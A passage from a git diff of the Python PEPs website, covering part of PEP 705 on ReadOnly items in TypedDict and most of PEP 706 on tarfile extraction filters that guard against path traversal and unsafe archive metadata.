It is possible to work around this issue with generics (as of Python 3.11), but it is very complicated, requiring a type parameter for every nested dict.

+
+
+
+

Rationale

+

These problems can be resolved by removing the ability to update one or more of the items in a TypedDict. This does not mean the items are immutable: a reference to the underlying dictionary could still exist with a different but compatible type in which those items have mutator operations. These items are “read-only”, and we introduce a new typing.ReadOnly type qualifier for this purpose.

+

The movie_string function in the first motivating example can then be typed as follows:

+
from typing import NotRequired, ReadOnly, TypedDict
+
+class Movie(TypedDict):
+    name: ReadOnly[str]
+    year: ReadOnly[NotRequired[int | None]]
+
+def movie_string(movie: Movie) -> str:
+    if movie.get("year") is None:
+        return movie["name"]
+    else:
+        return f'{movie["name"]} ({movie["year"]})'
+
+
+

A mixture of read-only and non-read-only items is permitted, allowing the second motivating example to be correctly annotated:

+
class HasTimestamp(TypedDict):
+    timestamp: float
+
+class HasTimestampedMetadata(TypedDict):
+    metadata: ReadOnly[HasTimestamp]
+
+def update_metadata_timestamp(d: HasTimestampedMetadata) -> None:
+    d["metadata"]["timestamp"] = now()
+
+class Logs(HasTimestamp):
+    loglines: list[str]
+
+class UserAudit(TypedDict):
+    name: str
+    metadata: Logs
+
+def rename_user(d: UserAudit, name: str) -> None:
+    d["name"] = name
+    update_metadata_timestamp(d)  # Now OK
+
+
+

In addition to these benefits, by flagging arguments of a function as read-only (by using a TypedDict like Movie with read-only items), it makes explicit not just to typecheckers but also to users that the function is not going to modify its inputs, which is usually a desirable property of a function interface.

+

This PEP proposes making ReadOnly valid only in a TypedDict. A possible future extension would be to support it in additional contexts, such as in protocols.

+
+
+

Specification

+

A new typing.ReadOnly type qualifier is added.

+
+

typing.ReadOnly type qualifier

+

The typing.ReadOnly type qualifier is used to indicate that an item declared in a TypedDict definition may not be mutated (added, modified, or removed):

+
from typing import ReadOnly
+
+class Band(TypedDict):
+    name: str
+    members: ReadOnly[list[str]]
+
+blur: Band = {"name": "blur", "members": []}
+blur["name"] = "Blur"  # OK: "name" is not read-only
+blur["members"] = ["Damon Albarn"]  # Type check error: "members" is read-only
+blur["members"].append("Damon Albarn")  # OK: list is mutable
+
+
+
+
+

Alternative functional syntax

+

The alternative functional syntax for TypedDict also supports the new type qualifier:

+
Band = TypedDict("Band", {"name": str, "members": ReadOnly[list[str]]})
+
+
+
+
+

Interaction with other special types

+

ReadOnly[] can be used with Required[], NotRequired[] and Annotated[], in any nesting order:

+
class Movie(TypedDict):
+    title: ReadOnly[Required[str]]  # OK
+    year: ReadOnly[NotRequired[Annotated[int, ValueRange(-9999, 9999)]]]  # OK
+
+
+
class Movie(TypedDict):
+    title: Required[ReadOnly[str]]  # OK
+    year: Annotated[NotRequired[ReadOnly[int]], ValueRange(-9999, 9999)]  # OK
+
+
+

This is consistent with the behavior introduced in PEP 655.

+
+
+

Inheritance

+

Subclasses can redeclare read-only items as non-read-only, allowing them to be mutated:

+
class NamedDict(TypedDict):
+    name: ReadOnly[str]
+
+class Album(NamedDict):
+    name: str
+    year: int
+
+album: Album = { "name": "Flood", "year": 1990 }
+album["year"] = 1973
+album["name"] = "Dark Side Of The Moon"  # OK: "name" is not read-only in Album
+
+
+

If a read-only item is not redeclared, it remains read-only:

+
class Album(NamedDict):
+    year: int
+
+album: Album = { "name": "Flood", "year": 1990 }
+album["name"] = "Dark Side Of The Moon"  # Type check error: "name" is read-only in Album
+
+
+

Subclasses can narrow value types of read-only items:

+
class AlbumCollection(TypedDict):
+    albums: ReadOnly[Collection[Album]]
+
+class RecordShop(AlbumCollection):
+    name: str
+    albums: ReadOnly[list[Album]]  # OK: "albums" is read-only in AlbumCollection
+
+
+

Subclasses can require items that are read-only but not required in the superclass:

+
class OptionalName(TypedDict):
+    name: ReadOnly[NotRequired[str]]
+
+class RequiredName(OptionalName):
+    name: ReadOnly[Required[str]]
+
+d: RequiredName = {}  # Type check error: "name" required
+
+
+

Subclasses can combine these rules:

+
class OptionalIdent(TypedDict):
+    ident: ReadOnly[NotRequired[str | int]]
+
+class User(OptionalIdent):
+    ident: str  # Required, mutable, and not an int
+
+
+

Note that these are just consequences of structural typing, but they are highlighted here as the behavior now differs from the rules specified in PEP 589.

+
+
+

Type consistency

+

This section updates the type consistency rules introduced in PEP 589 to cover the new feature in this PEP. In particular, any pair of types that do not use the new feature will be consistent under these new rules if (and only if) they were already consistent.

+

A TypedDict type A is consistent with TypedDict B if A is structurally compatible with B. This is true if and only if all of the following are satisfied:

+
    +
  • For each item in B, A has the corresponding key, unless the item in B is read-only, not required, and of top value type (ReadOnly[NotRequired[object]]).
  • +
  • For each item in B, if A has the corresponding key, the corresponding value type in A is consistent with the value type in B.
  • +
  • For each non-read-only item in B, its value type is consistent with the corresponding value type in A.
  • +
  • For each required key in B, the corresponding key is required in A.
  • +
  • For each non-required key in B, if the item is not read-only in B, the corresponding key is not required in A.
  • +
+

Discussion:

+
    +
  • All non-specified items in a TypedDict implicitly have value type ReadOnly[NotRequired[object]].
  • +
  • Read-only items behave covariantly, as they cannot be mutated. This is similar to container types such as Sequence, and different from non-read-only items, which behave invariantly. Example:
    class A(TypedDict):
    +    x: ReadOnly[int | None]
    +
    +class B(TypedDict):
    +    x: int
    +
    +def f(a: A) -> None:
    +    print(a["x"] or 0)
    +
    +b: B = {"x": 1}
    +f(b)  # Accepted by type checker
    +
    +
    +
  • +
  • A TypedDict type A with no explicit key 'x' is not consistent with a TypedDict type B with a non-required key 'x', since at runtime the key 'x' could be present and have an incompatible type (which may not be visible through A due to structural subtyping). The only exception to this rule is if the item in B is read-only, and the value type is of top type (object). For example:
    class A(TypedDict):
    +    x: int
    +
    +class B(TypedDict):
    +    x: int
    +    y: ReadOnly[NotRequired[object]]
    +
    +a: A = { "x": 1 }
    +b: B = a  # Accepted by type checker
    +
    +
    +
  • +
+
+
+

Update method

+

In addition to existing type checking rules, type checkers should error if a TypedDict with a read-only item is updated with another TypedDict that declares that key:

+
class A(TypedDict):
+    x: ReadOnly[int]
+    y: int
+
+a1: A = { "x": 1, "y": 2 }
+a2: A = { "x": 3, "y": 4 }
+a1.update(a2)  # Type check error: "x" is read-only in A
+
+
+

Unless the declared value is of bottom type (Never):

+
class B(TypedDict):
+    x: NotRequired[typing.Never]
+    y: ReadOnly[int]
+
+def update_a(a: A, b: B) -> None:
+    a.update(b)  # Accepted by type checker: "x" cannot be set on b
+
+
+

Note: Nothing will ever match the Never type, so an item annotated with it must be absent.

+
+
+

Keyword argument typing

+

PEP 692 introduced Unpack to annotate **kwargs with a TypedDict. Marking one or more of the items of a TypedDict used in this way as read-only will have no effect on the type signature of the method. However, it will prevent the item from being modified in the body of the function:

+
class Args(TypedDict):
+    key1: int
+    key2: str
+
+class ReadOnlyArgs(TypedDict):
+    key1: ReadOnly[int]
+    key2: ReadOnly[str]
+
+class Function(Protocol):
+    def __call__(self, **kwargs: Unpack[Args]) -> None: ...
+
+def impl(**kwargs: Unpack[ReadOnlyArgs]) -> None:
+    kwargs["key1"] = 3  # Type check error: key1 is readonly
+
+fn: Function = impl  # Accepted by type checker: function signatures are identical
+
+
+
+
+

Runtime behavior

+

TypedDict types will gain two new attributes, __readonly_keys__ and __mutable_keys__, which will be frozensets containing all read-only and non-read-only keys, respectively:

+
class Example(TypedDict):
+    a: int
+    b: ReadOnly[int]
+    c: int
+    d: ReadOnly[int]
+
+assert Example.__readonly_keys__ == frozenset({'b', 'd'})
+assert Example.__mutable_keys__ == frozenset({'a', 'c'})
+
+
+

typing.get_type_hints will strip out any ReadOnly type qualifiers, unless include_extras is True:

+
assert get_type_hints(Example)['b'] == int
+assert get_type_hints(Example, include_extras=True)['b'] == ReadOnly[int]
+
+
+

typing.get_origin and typing.get_args will be updated to recognize ReadOnly:

+
assert get_origin(ReadOnly[int]) is ReadOnly
+assert get_args(ReadOnly[int]) == (int,)
+
+
+
+
+
+

Backwards compatibility

+

This PEP adds a new feature to TypedDict, so code that inspects TypedDict types will have to change to support types using it. This is expected to mainly affect type-checkers.
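+
For example, a tool inspecting TypedDicts on Python 3.13+ might use a helper along these lines. This sketch only detects ReadOnly as the outermost qualifier; nested forms such as Required[ReadOnly[...]] would need additional unwrapping:
+
from typing import ReadOnly, get_origin, get_type_hints
+
+def readonly_keys(td: type) -> frozenset:
+    # Python 3.13+ exposes this directly on TypedDict types.
+    keys = getattr(td, "__readonly_keys__", None)
+    if keys is not None:
+        return keys
+    # Fallback: inspect the annotations ourselves.
+    hints = get_type_hints(td, include_extras=True)
+    return frozenset(
+        name for name, hint in hints.items() if get_origin(hint) is ReadOnly
+    )
+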

+
+
+

Security implications

+

There are no known security consequences arising from this PEP.

+
+
+

How to teach this

+

Suggested changes to the typing module documentation, in line with current practice:

+
    +
  • Add this PEP to the others listed.
  • +
  • Add typing.ReadOnly, linked to TypedDict and this PEP.
  • +
  • Add the following text to the TypedDict entry:
  • +
+

The ReadOnly type qualifier indicates that an item declared in a TypedDict definition may be read but not mutated (added, modified or removed). This is useful when the exact type of the value is not known yet, and so modifying it would break structural subtypes. insert example

+
+
+

Reference implementation

+

pyright 1.1.333 fully implements this proposal.

+
+
+

Rejected alternatives

+
+

A TypedMapping protocol type

+

An earlier version of this PEP proposed a TypedMapping protocol type, behaving much like a read-only TypedDict but without the constraint that the runtime type be a dict. The behavior described in the current version of this PEP could then be obtained by inheriting a TypedDict from a TypedMapping. This has been set aside for now as more complex, without a strong use-case motivating the additional complexity.

+
+
+

A higher-order ReadOnly type

+

A generalized higher-order type could be added that removes mutator methods from its parameter, e.g. ReadOnly[MovieRecord]. For a TypedDict, this would be like adding ReadOnly to every item, including those declared in superclasses. This would naturally want to be defined for a wider set of types than just TypedDict subclasses, and also raises questions about whether and how it applies to nested types. We decided to keep the scope of this PEP narrower.

+
+
+

Calling the type Readonly

+

Read-only is generally hyphenated, and it appears to be common convention to put initial caps onto words separated by a dash when converting to CamelCase. This appears consistent with the definition of CamelCase on Wikipedia: CamelCase uppercases the first letter of each word. That said, Python examples or counter-examples, ideally from the core Python libraries, or better explicit guidance on the convention, would be greatly appreciated.

+
+
+

Reusing the Final annotation

+

The Final annotation prevents an attribute from being modified, like the proposed ReadOnly qualifier does for TypedDict items. However, it is also documented as preventing redefinition in subclasses; from PEP 591:

+
+
The typing.Final type qualifier is used to indicate that a variable or attribute should not be reassigned, redefined, or overridden.
+

This does not fit with the intended use of ReadOnly. Rather than introduce confusion by having Final behave differently in different contexts, we chose to introduce a new qualifier.

+
+
+

A readonly flag

+

Earlier versions of this PEP introduced a boolean flag that would ensure all items in a TypedDict were read-only:

+
class Movie(TypedDict, readonly=True):
+    name: str
+    year: NotRequired[int | None]
+
+movie: Movie = { "name": "A Clockwork Orange" }
+movie["year"] = 1971  # Type check error: "year" is read-only
+
+
+

However, this led to confusion when inheritance was introduced:

+
class A(TypedDict):
+    key1: int
+
+class B(A, TypedDict, readonly=True):
+    key2: int
+
+b: B = { "key1": 1, "key2": 2 }
+b["key1"] = 4  # Accepted by type checker: "key1" is not read-only
+
+
+

It would be reasonable for someone familiar with frozen (from dataclasses), on seeing just the definition of B, to assume that the whole type was read-only. On the other hand, it would be reasonable for someone familiar with total to assume that read-only only applies to the current type.

+

The original proposal attempted to eliminate this ambiguity by making it both a type check and a runtime error to define B in this way. This was still a source of surprise to people expecting it to work like total.

+

Given that no extra types could be expressed with the readonly flag, it has been removed from the proposal to avoid ambiguity and surprise.

+
+
+

Supporting type-checked removal of read-only qualifier via copy and other methods

+

An earlier version of this PEP mandated that code like the following be supported by type-checkers:

+
class A(TypedDict):
+    x: ReadOnly[int]
+
+class B(TypedDict):
+    x: ReadOnly[str]
+
+class C(TypedDict):
+    x: int | str
+
+def copy_and_modify(a: A) -> C:
+    c: C = copy.copy(a)
+    if not c['x']:
+        c['x'] = "N/A"
+    return c
+
+def merge_and_modify(a: A, b: B) -> C:
+    c: C = a | b
+    if not c['x']:
+        c['x'] = "N/A"
+    return c
+
+
+

However, there is currently no way to express this in the typeshed, meaning type-checkers would be forced to special-case these functions. There is already a way to code these operations that mypy and pyright do support, though arguably this is less readable:

+
copied: C = { **a }
+merged: C = { **a, **b }
+
+
+

While not as flexible as would be ideal, the current typeshed stubs are sound, and remain so if this PEP is accepted. Updating the typeshed would require new typing features, like a type constructor to express the type resulting from merging two or more dicts, and a type qualifier to indicate a returned value is not shared (so may have type constraints like read-only and invariance of generics loosened in specific ways), plus details of how type-checkers would be expected to interpret these features. These could be valuable additions to the language, but are outside the scope of this PEP.

+

Given this, we have deferred any update of the typeshed stubs.

+
+
+

Preventing unspecified keys in TypedDicts

+

Consider the following “type discrimination” code:

+
class A(TypedDict):
+  foo: int
+
+class B(TypedDict):
+  bar: int
+
+def get_field(d: A | B) -> int:
+  if "foo" in d:
+    return d["foo"]  # !!!
+  else:
+    return d["bar"]
+
+
+

This is a common idiom, and other languages like TypeScript allow it. Technically, however, this code is unsound: B does not declare foo, but instances of B may still have the key present, and the associated value may be of any type:

+
class C(TypedDict):
+  foo: str
+  bar: int
+
+c: C = { "foo": "hi", "bar": 3 }
+b: B = c  # OK: C is structurally compatible with B
+v = get_field(b)  # Returns a string at runtime, not an int!
+
+
+

mypy rejects the definition of get_field on the marked line with the error TypedDict "B" has no key "foo", which is a rather confusing error message, but is caused by this unsoundness.

+

One option for correcting this would be to explicitly prevent B from holding a foo:

+
class B(TypedDict):
+  foo: NotRequired[Never]
+  bar: int
+
+b: B = c  # Type check error: key "foo" not allowed in B
+
+
+

However, this requires every key that might be used for discrimination to be explicitly declared in every type, which is not generally feasible. A better option would be to prevent all unspecified keys from being included in B. mypy supports this using the @final decorator from PEP 591:

+
@final
+class B(TypedDict):
+  bar: int
+
+
+

The reasoning here is that this prevents C or any other type from being considered a “subclass” of B, so instances of B can now be relied on to never hold the key foo, even though it is not explicitly declared to be of the bottom type.

+

With the introduction of read-only items, however, this reasoning would imply type-checkers should ban the following:

+
@final
+class D(TypedDict):
+  field: ReadOnly[Collection[str]]
+
+@final
+class E(TypedDict):
+  field: list[str]
+
+e: E = { "field": ["value1", "value2"] }
+d: D = e  # Error?
+
+
+

The conceptual problem here is that TypedDicts are structural types: they cannot really be subclassed. As such, using @final on them is not well-defined; it is certainly not mentioned in PEP 591.

+

An earlier version of this PEP proposed resolving this by adding a new flag to TypedDict that would explicitly prevent other keys from being used, but not other kinds of structural compatibility:

+
class B(TypedDict, other_keys=Never):
+  bar: int
+
+b: B = c  # Type check error: key "foo" not allowed in B
+
+
+

However, during the process of drafting, the situation changed:

+ +

As such, there is less urgency to address this issue in this PEP, and it has been deferred to PEP 728.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0705.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0706/index.html b/pep-0706/index.html new file mode 100644 index 00000000000..ffe39b86fda --- /dev/null +++ b/pep-0706/index.html @@ -0,0 +1,791 @@ + + + + + + + + PEP 706 – Filter for tarfile.extractall | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 706 – Filter for tarfile.extractall

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2023
+
Python-Version:
+
3.12
+
Post-History:
+
25-Jan-2023, +15-Feb-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at tarfile documentation.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

The extraction methods in tarfile gain a filter argument, +which allows rejecting files or modifying metadata as the archive is extracted. +Three built-in named filters are provided, aimed at limiting features that +might be surprising or dangerous. +These can be used as-is, or serve as a base for custom filters.

+

After a deprecation period, a strict (but safer) filter will become the default.

+
+
+

Motivation

+

The tar format is used for several use cases, many of which have different +needs. For example:

+
    +
  • A backup of a UNIX workstation should faithfully preserve all kinds of +details like file permissions, symlinks to system configuration, and various +kinds of special files.
  • +
  • When unpacking a data bundle, it’s much more important that the unpacking +will not have unintended consequences – like exposing a password file by +symlinking it to a public place.
  • +
+

To support all its use cases, the tar format has many features. +In many cases, it’s best to ignore or disallow some of them when extracting +an archive.

+

Python allows extracting tar archives using +tarfile.TarFile.extractall(), whose docs warn to +never extract archives from untrusted sources without prior inspection. +However, it’s not clear what kind of inspection should be done. +Indeed, it’s quite tricky to do such an inspection correctly. +As a result, many people don’t bother, or do the check incorrectly, resulting in +security issues such as CVE-2007-4559.

+

Since tarfile was first written, it’s become more +accepted that warnings in documentation are not enough. +Whenever possible, an unsafe operation should be explicitly requested; +potentially dangerous operations should look dangerous. +However, TarFile.extractall looks benign in a code review.

+

Tarfile extraction is also exposed via shutil.unpack_archive(), +which allows the user to not care about the kind of archive they’re +dealing with. +The API is very inviting for extracting archives without prior inspection, +even though the docs again warn against it.

+

It has been argued that Python is not wrong – it behaves exactly as +documented – but that’s beside the point. +Let’s improve the situation rather than assign/avoid blame. +Python and its docs are the best place to improve things.

+
+
+

Rationale

+

How do we improve things? +Unfortunately, we will need to change the defaults, which implies +breaking backwards compatibility. TarFile.extractall +is what people reach for when they need to extract a tarball. +Its default behaviour needs to change.

+

What would be the best behaviour? That depends on the use case. +So, we’ll add several general “policies” to control extraction. +They are based on use cases, and ideally they should have straightforward +security implications:

+
    +
  • Current behavior: trusting the archive. Suitable e.g. as a building block +for libraries that do the check themselves, or extracting an archive you just +made yourself.
  • +
  • Unpacking a UNIX archive: roughly following GNU tar, e.g. stripping +leading / from filenames.
  • +
  • Unpacking a general data archive: the shutil.unpack_archive() +use case, +where it’s not important to preserve details specific to tar or +Unix-like filesystems.
  • +
+

After a deprecation period, the last option – the most limited +but most secure one – will become the default.

+

Even with better general defaults, users should still verify the archives +they extract, and perhaps modify some of the metadata. +Superficially, the following looks like a reasonable way to do this today:

+ +
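
A sketch of that approach, where check_is_safe is a hypothetical user-written predicate and my_tarfile an already-open TarFile:

+
members = []
+for member in my_tarfile.getmembers():
+    if not check_is_safe(member):
+        raise ValueError(f'unsafe member: {member.name}')
+    member.uid = 0  # mutates the "live" TarInfo -- see the issues below
+    members.append(member)
+my_tarfile.extractall(members=members)
+
+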

However, there are some issues with this approach:

+
    +
  • It’s possible to modify TarInfo objects, but the changes to them +affect all subsequent operations on the same TarFile object. +This behavior is fine for most uses, but despite that, it would be very +surprising if TarFile.extractall did this by default.
  • +
  • Calling getmembers can be expensive and it +requires a seekable archive.
  • +
  • When verifying members in advance, it may be necessary to track how each +member would have changed the filesystem, e.g. how symlinks are being set up. +This is hard. We can’t expect users to do it.
  • +
+

To solve these issues we’ll:

+
    +
  • Provide a supported way to “clone” and modify TarInfo objects. +A replace method, similar to dataclasses.replace() +or namedtuple._replace +should do the trick.
  • +
  • Provide a “filter” hook in extractall’s loop that can modify or discard +members before they are processed.
  • +
  • Require that this hook is called just before extracting each member, +so it can scan the current state of the disk. This will greatly simplify +the implementation of policies (both in stdlib and user code), +at the cost of not being able to do a precise “dry run”.
  • +
+

The hook API will be very similar to the existing filter argument +for TarFile.add. +We’ll also name it filter. +(In some cases “policy” would be a more fitting name, +but the API can be used for more than security policies.)

+

The built-in policies/filters described above will be implemented using the +public filter API, so they can be used as building blocks or examples.

+
+

Setting a precedent

+

If and when other libraries for archive extraction, such as zipfile, +gain similar functionality, they should mimic this API as much as it’s +reasonable.

+

To enable this for simple cases, the built-in filters will have string names; +e.g. users can pass filter='data' instead of a specific function that deals +with TarInfo objects.
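
+

For example (the archive and destination names are illustrative):

+
import tarfile
+
+# 'data' names a built-in filter; no function object is needed.
+with tarfile.open('bundle.tar.gz') as tf:
+    tf.extractall(path='dest', filter='data')
+
+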

+

The shutil.unpack_archive() function will get a +filter argument, which it will pass to extractall.

+

Adding a function-based API that would work across archive formats is +out of scope of this PEP.

+
+
+

Full disclosure & redistributor info

+

The PEP author works for Red Hat, a redistributor of Python with different +security needs and support periods than CPython in general. +Such redistributors may want to carry vendor patches to:

+
    +
  • Allow configuring the defaults system-wide, and
  • +
  • Change the default as soon as possible, even in older Python versions.
  • +
+

The proposal makes this easy to do, and it allows users to query +the settings.

+
+
+
+

Specification

+
+

Modifying and forgetting member metadata

+

The TarInfo class will gain a new method, +replace(), which will work similarly to dataclasses.replace. +It will return a copy of the TarInfo object with attributes +replaced as specified by keyword-only arguments:

+
    +
  • name
  • +
  • mtime
  • +
  • mode
  • +
  • linkname
  • +
  • uid
  • +
  • gid
  • +
  • uname
  • +
  • gname
  • +
+

Any of these, except name and linkname, will be allowed to be set +to None. +When extract or extractall encounters such a None, it will not +set that piece of metadata. +(If uname or gname is None, it will fall back to uid or gid +as if the name wasn’t found.) +When addfile or tobuf encounters such a None, it will raise a +ValueError. +When list encounters such a None, it will print a placeholder string.
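
+

A small sketch of the intended usage (archive and member names are illustrative):

+
import tarfile
+
+with tarfile.open('bundle.tar') as tf:
+    member = tf.getmember('data/report.txt')
+    # replace() returns a modified copy; the "live" TarInfo in the
+    # archive's member list is left untouched.
+    anonymized = member.replace(uid=None, gid=None, uname=None, gname=None)
+    tf.extract(anonymized, path='dest')
+
+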

+

The documentation will mention why the method is there: +TarInfo objects retrieved from TarFile.getmembers +are “live”; modifying them directly will affect subsequent unrelated +operations.

+
+
+

Filters

+

TarFile.extract and +TarFile.extractall methods +will grow a filter keyword-only parameter, +which takes a callable that can be called as:

+
filter(member: TarInfo, path: str, /) -> TarInfo|None
+
+
+

where member is the member to be extracted, and path is the path to +where the archive is extracted (i.e., it’ll be the same for every member).

+

When used it will be called on each member as it is extracted, +and extraction will work with the result. +If it returns None, the member will be skipped.

+

The function can also raise an exception. +This can, depending on TarFile.errorlevel, +abort the extraction or cause the member to be skipped.
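
+

A minimal custom filter following this protocol might look like the following (the specific rules are arbitrary illustrations):

+
import tarfile
+
+def cautious_filter(member: tarfile.TarInfo, path: str) -> tarfile.TarInfo | None:
+    if member.isdev():
+        return None  # skip device files; they will not be extracted
+    if member.issym():
+        # Raising aborts the extraction or skips the member,
+        # depending on TarFile.errorlevel.
+        raise ValueError(f'symlink not allowed: {member.name}')
+    return member
+
+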

+
+

Note

+

If extraction is aborted, the archive may be left partially +extracted. It is the user’s responsibility to clean up.

+
+

We will also provide a set of defaults for common use cases. +In addition to a function, the filter argument can be one +of the following strings:

+
    +
  • 'fully_trusted': Current behavior: honor the metadata as is. +Should be used if the user trusts the archive completely, or implements their +own complex verification.
  • +
  • 'tar': Roughly follow defaults of the GNU tar command +(when run as a normal user):
      +
    • Strip leading '/' and os.sep from filenames
    • +
    • Refuse to extract files with absolute paths (after the / stripping +above, e.g. C:/foo on Windows).
    • +
    • Refuse to extract files whose absolute path (after following symlinks) +would end up outside the destination. +(Note that GNU tar instead delays creating some links.)
    • +
    • Clear high mode bits (setuid, setgid, sticky) and group/other write bits +(S_IWGRP|S_IWOTH). +(This is an approximation of GNU tar’s default, which limits the mode +by the current umask setting.)
    • +
    +
  • +
  • 'data': Extract a “data” archive, disallowing common attack vectors +but limiting functionality. +In particular, many features specific to UNIX-style filesystems (or +equivalently, to the tar archive format) are ignored, making this a good +filter for cross-platform archives. +In addition to tar:
      +
    • Refuse to extract links (hard or soft) that link to absolute paths.
    • +
    • Refuse to extract links (hard or soft) which end up linking to a path +outside of the destination. +(On systems that don’t support links, tarfile will, in most cases, +fall back to creating regular files. +This proposal doesn’t change that behaviour.)
    • +
    • Refuse to extract device files (including pipes).
    • +
    • For regular files and hard links: set the owner read and write permissions (S_IRUSR|S_IWUSR); remove the group & other executable permission (S_IXGRP|S_IXOTH) if the owner doesn’t have it (S_IXUSR).
    • +
    • For other files (directories), ignore mode entirely (set it to None).
    • +
    • Ignore user and group info (set uid, gid, uname, gname +to None).
    • +
    +
  • +
+

Any other string will cause a ValueError.

+

The corresponding filter functions will be available as +tarfile.fully_trusted_filter(), tarfile.tar_filter(), etc., so +they can be easily used in custom policies.

+

Note that these filters never return None. +Skipping members this way is a feature for user-defined filters.

+
+
+

Defaults and their configuration

+

TarFile will gain a new attribute, +extraction_filter, to allow configuring the default filter. +By default it will be None, but users can set it to a callable +that will be used if the filter argument is missing or None.

+
+

Note

+

String names won’t be accepted here. That would encourage code like +my_tarfile.extraction_filter = 'data'. +On Python versions without this feature, this would do nothing, +silently ignoring a security-related request.

+
+

If both the argument and attribute are None:

+
    +
  • In Python 3.12-3.13, a DeprecationWarning will be emitted and +extraction will use the 'fully_trusted' filter.
  • +
  • In Python 3.14+, it will use the 'data' filter.
  • +
+

Applications and system integrators may wish to change extraction_filter +of the TarFile class itself to set a global default. +When using a function, they will generally want to wrap it in staticmethod() +to prevent injection of a self argument.
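
+

For example:

+
import tarfile
+
+# Process-wide default for all TarFile objects. staticmethod() stops
+# Python from binding the function and injecting a `self` argument.
+tarfile.TarFile.extraction_filter = staticmethod(tarfile.data_filter)
+
+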

+

Subclasses of TarFile can also override extraction_filter.

+
+
+

FilterError

+

A new exception, FilterError, will be added to the tarfile +module. +It’ll have several new subclasses, one for each of the refusal reasons above. +FilterError’s member attribute will contain the relevant TarInfo.

+

In the lists above, “refusing” to extract a file means that a FilterError +will be raised. +As with other extraction errors, if the TarFile.errorlevel +is 1 or more, this will abort the extraction; with errorlevel=0 the error +will be logged and the member will be ignored, but extraction will continue. +Note that extractall() may leave the archive partially extracted; +it is the user’s responsibility to clean up.

+
+
+

Errorlevel, and fatal/non-fatal errors

+

Currently, TarFile has an errorlevel +argument/attribute, which specifies how errors are handled:

+
    +
  • With errorlevel=0, documentation says that “all errors are ignored +when using extract() and +extractall()”. +The code only ignores non-fatal and fatal errors (see below), +so, for example, you still get TypeError if you pass None as the +destination path.
  • +
  • With errorlevel=1 (the default), all non-fatal errors are ignored. +(They may be logged to sys.stderr by setting the debug +argument/attribute.) +Which errors are non-fatal is not defined in documentation, but code treats +ExtractionError as such. Specifically, it’s these issues:
      +
    • “unable to resolve link inside archive” (raised on systems that do not +support symlinks)
    • +
    • “fifo/special devices not supported by system” (not used for failures if +the system supports these, e.g. for a PermissionError)
    • +
    • “could not change owner/mode/modification time”
    • +
    +

    Note that, for example, file name too long or out of disk space don’t +qualify. +The non-fatal errors are not very likely to appear on a Unix-like system.

    +
  • +
  • With errorlevel=2, all errors are raised, including fatal ones. +Which errors are fatal is, again, not defined; in practice it’s +OSError.
  • +
+

A filter refusing to extract a member does not fit neatly into the +fatal/non-fatal categories.

+
    +
  • This PEP does not change existing behavior. (Ideas for improvements are +welcome in Discourse topic 25970.)
  • +
  • When a filter refuses to extract a member, the error should not pass +silently by default.
  • +
+

To satisfy this, FilterError will be considered a fatal error, that is, +it’ll be ignored only with errorlevel=0.

+

Users that want to ignore FilterError but not other fatal errors should +create a custom filter function, and call another filter in a try block.
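
+

A sketch of such a wrapper filter:

+
import tarfile
+
+def skip_refused(member, path):
+    try:
+        return tarfile.data_filter(member, path)
+    except tarfile.FilterError:
+        return None  # skip this member; other fatal errors still propagate
+
+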

+
+
+

Hints for further verification

+

Even with the proposed changes, tarfile will not be +suited for extracting untrusted files without prior inspection. +Among other issues, the proposed policies don’t prevent denial-of-service +attacks. +Users should do additional checks.

+

New docs will tell users to consider:

+
    +
  • extracting to a new empty directory,
  • +
  • using external (e.g. OS-level) limits on disk, memory and CPU usage,
  • +
  • checking filenames against an allow-list of characters (to filter out control +characters, confusables, etc.),
  • +
  • checking that filenames have expected extensions (discouraging files that +execute when you “click on them”, or extension-less files like Windows +special device names),
  • +
  • limiting the number of extracted files, total size of extracted data, +and size of individual files,
  • +
  • checking for files that would be shadowed on case-insensitive filesystems.
  • +
+

Also, the docs will note that:

+
    +
  • tar files commonly contain multiple versions of the same file: later ones are +expected to overwrite earlier ones on extraction,
  • +
  • tarfile does not protect against issues with “live” data, e.g. an attacker +tinkering with the destination directory while extracting (or adding) is +going on (see the GNU tar manual +for more info).
  • +
+

This list is not comprehensive, but the documentation is a good place to +collect such general tips. +It can be moved into a separate document if it grows too long or if it needs to +be consolidated with zipfile or shutil +(which is out of scope for this proposal).

+
+
+

TarInfo identity, and offset

+

With filters that use replace(), the TarInfo objects handled +by the extraction machinery will not necessarily be the same objects +as those present in members. +This may affect TarInfo subclasses that override methods like +makelink and rely on object identity.

+

Such code can switch to comparing offset, the position of the member +header inside the file.

+

Note that both the overridable methods and offset are only +documented in source comments.

+
+
+

tarfile CLI

+

The CLI (python -m tarfile) will gain a --filter option +that will take the name of one of the provided default filters. +It won’t be possible to specify a custom filter function.

+

If --filter is not given, the CLI will use the default filter +('fully_trusted' with a deprecation warning now, and 'data' from +Python 3.14 on).

+

There will be no short option. (-f would be confusingly similar to +the filename option of GNU tar.)

+
+
+

Other archive libraries

+

If and when other archive libraries, such as zipfile, +grow similar functionality, their extraction functions should use a filter +argument that takes, at least, the strings 'fully_trusted' (which should +disable any security precautions) and 'data' (which should avoid features +that might surprise users).

+

Standardizing a function-based filter API is out of scope of this PEP.

+
+
+

Shutil

+

shutil.unpack_archive() will gain a filter argument. +If it’s given, it will be passed to the underlying extraction function. +Passing it for a zip archive will fail for now (until zipfile +gains a filter argument, if it ever does).
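
+

For example (the archive name is illustrative):

+
import shutil
+
+# Explicitly request the 'data' filter for a tar archive.
+shutil.unpack_archive('bundle.tar.gz', 'dest', filter='data')
+
+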

+

If filter is not specified (or left as None), it won’t be passed +on, so extracting a tarball will use the default filter +('fully_trusted' with a deprecation warning now, and 'data' from +Python 3.14 on).

+
+
+

Complex filters

+

Note that some user-defined filters need, for example, +to count extracted members or do post-processing. +This requires a more complex API than a filter callable. +However, that complex API need not be exposed to tarfile. +For example, with a hypothetical StatefulFilter users would write:

+
with StatefulFilter() as filter_func:
